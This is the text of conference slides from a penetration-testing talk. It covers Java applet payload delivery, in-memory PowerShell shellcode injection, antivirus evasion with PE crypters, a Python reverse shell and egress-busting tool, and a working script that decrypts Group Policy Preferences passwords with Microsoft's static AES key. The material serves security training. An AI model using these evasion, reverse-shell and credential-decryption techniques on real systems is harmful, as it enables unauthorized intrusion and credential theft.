BSIDES Las Vegas Secret Pentesting Techniques Shhh... Dave Kennedy Founder, Principal Security Consultant Email: davek@trustedsec.

com https://www.trustedsec.com @TrustedSec

Introduc)on
As penetration testers, exploit writers, huggers, etc. we have secret techniques we always use. Although some may or may not be public, they are generally obscure and not well known.

 The purpose of todays talk is to show you my secrets.. Some of my techniques that I use that arent widely known. Why show you? Im an open book on everything I do and sharing is what its all about.

Technique #1
Java Applet Attack (SET) Well known attack method right? Do you know how it actually works? Do you know the techniques behind it to make it successful?

ZOMG APT
News agencies around the world discovered a new and extremely advanced zero-day exploit against Java. Made me feel kind of special =) How people found out it was set?

ILIKEHUGS

DEMO: Walking through the Attack

Explaining the Applet

Parameters that are injected into the HTML code are pulled from the Applet. Obfuscated and randomized each time. Parameters tell the Applet which attacks to use.

Method 1 Binary Dropper

Binary is downloaded from attacker machine via web server (Java downloader) Obfuscated binary each time per deployment.. Combination of PE manipulation, UPX, and rewriting binary on y (import pele)

DEMO: Binary Dropping Technique

Method 1 Weak Sauce

Binarys are easily picked up by AV if signatures focus on obfuscation techniques. (SET changes them each version) Direct interaction with Windows le system and writing to disk. Multiple points of evidence on victim machine.

Method 2 Shellcodeexec
Shellcodeexec method drops a custom compiled and modied version of shellcodeexec by Bernardo Damele. Executable takes int main(int argc, char*argv[]) parameter for alphanumeric shellcode. Uses VirtualAlloc for read, write, and execute memory space. Alphanumeric shellcode is executed in memory and payload is delivered.

DEMO: ShellcodeExec

Method 2 Easily detectable

Shellcodeexec is a simple yet awesome method but still has a number of drawbacks. Like Method 1 Binarys can be picked up unless custom version created. Direct interaction with Windows le system and writing to disk. Like Method 1 - Multiple points of evidence on victim machine.

Method 3 Powershell Injec)on

Detect if Powershell is installed (installed by default on Vista and Windows 7 and 8). Powershell gives us complete exibility on a number of post exploitation situations. Technique discovered by Matthew Graeber (you rock).

Method 3 PS ShellCode Injec)on

Applet detects if powershell is installed on system. Grabs the operating system type (x86 / x64) Deploys Shellcode straight through powershell.

DEMO: ShellcodeExec

Method 3 Powershell Injec)on

Never touches disk AV / HIPS signatures go out the door. Obfuscated each time so that memory inspection is extremely dicult. Extremely reliable and stable.

PE Security Evasion

Scenario 1 Dropping PEs like its hot

Your using Metasploit All of them are being picked up by AV, HIPS, etc. Most cases, I will rewrite the exe template for Metasploit to customize binary for evasion. Couple cool ways to do this.

Modifying PE For Evasion in MSF

Easiest way for me is to make a simple program that creates a RWX process then have the program execute Metasploit Shellcode. You can also modify the Metasploit exe.rb template and obfuscate the code that way.

PE Crypters
One of my favorites was recently released called Hyperion (Christian Ammann from nullsecurity.net). Encrypts PE the le using a randomized simple cipher key with AES 128. When executable is run, it brute forces the AES key then decrypts the PE le for you.

DEMO: Hyperion

Hyperion Encryp)on
Very cool concept and easy to use and write one for yourself. Ability to have a completely unique PE le each time. Slight downfall, stub used for brute force is not polymorphic.

Building a Simple Reverse Shell

The Reverse Shell

Connects out to the attacker (reverse shell).

Compiling Binaries
PyInstaller Compiles python code for you into a binary by wrapping the Python Interpreter into the executable. Works on Linux, OSX, and Windows. python Congure.py python Makespec.py onele noconsole shell.py python Build.py shell/shell.spec cd shell\dist

Making it easy pybuild.py

All code and samples will be released on the TrustedSec website soon.

DEMO: Building a Shell

Bypassing AV

Finding your way home

Bumping the Firewall

A number of companies restrict ports outbound and only allow whats needed for the business. Trouble getting payloads out, especially if you only have one shot.

Egress Bus)ng
Few ways to do it, pre-staged payload for identifying way out. Attempt staged reverse on every port. Metasploit has an ALLPORTS payload as well.

Egress Buster 0.2

Server/Client situation where victim connects out on every port 1024 ports at a time. Server listens for connection and reports back. Heres where you can have some fun.

Egress Buster Reverse Shell

Egress Buster Reverse Shell

Released this week! Allows you to bust all ports inside the rewall and spawn a command shell. Custom, so no AV picks this up. Byte compiled into an executable.

DEMO: Egress Buster Reverse Shell

Egress Buster Reverse Shell Usage

Recent Penetration Test Found le upload + execute binarys. Could not nd a standard port out i.e. 80, 443, 53, 25, etc. Wrote this to deploy and found several obscure ports that were allowed.

Fun with Group Policy

One of my PERSONAL Favorites

How many times have we been on a pentest with just a domain user? Need that local administrator account for all of the domain computers? Research from: Sogeti ESEC Pentest Article: http://esec-pentest.sogeti.com/ exploiting-windows-2008-group-policypreferences

The AZack
Navigate to a domain controller and hit up the SYSVOL share. Head to the domain name and Policies folder. Look for a GUID then MACHINE \Preferences\Group. Look for the Groups.xml le.

Contents of File

Sta)c Key for AES Anyone?

Python Code
# code was developed and created from # http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences from Crypto.Cipher import AES from base64 import b64decode key = """ 4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b """.replace(" ","").replace("\n","").decode('hex') cpassword = b64decode("j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw=") o = AES.new(key, 2).decrypt(cpassword) print o[:-ord(o[-1])].decode('utf16')

Decrypted Password

>>> print o[:-ord(o[-1])].decode('utf16') Local*P4ssword!

Expanding on Group.xml

More Passwords Stored

The folks over at rewt dance ( http://rewtdance.blogspot.com/ 2012/06/exploiting-windows-2008group-policy.html) found a few more areas that store passwords using the cpassword attribute. Services, ScheduledTasks, SQL servers and much more are impacted.

List of Other Aected Areas (from rewt dance)

Services\Services.xml http://msdn.microsoft.com/en-us/library/cc980070(v=prot.13) ScheduledTasks\ScheduledTasks.xml http://msdn.microsoft.com/en-us/library/cc422920(v=prot.13) http://msdn.microsoft.com/en-us/library/dd341350(v=prot.13) http://msdn.microsoft.com/en-us/library/dd304114(v=prot.13) Printers\Printers.xml http://msdn.microsoft.com/en-us/library/cc422918(v=prot.13) Drives\Drives.xml http://msdn.microsoft.com/en-us/library/cc704598(v=prot.13) DataSources\DataSources.xml http://msdn.microsoft.com/en-us/library/cc422926(v=prot.13)

Theres a ton more of these Hopefully can make these a series.

Downloads

For the code and tools used in this presentation, head over to https://www.trustedsec.com and click on the Downloads.

Secret Pentesting Techniques Shhh... Dave Kennedy Founder, Principal Security Consultant Email: davek@trustedsec.com https://www.trustedsec.com TrustedSec, LLC @TrustedSec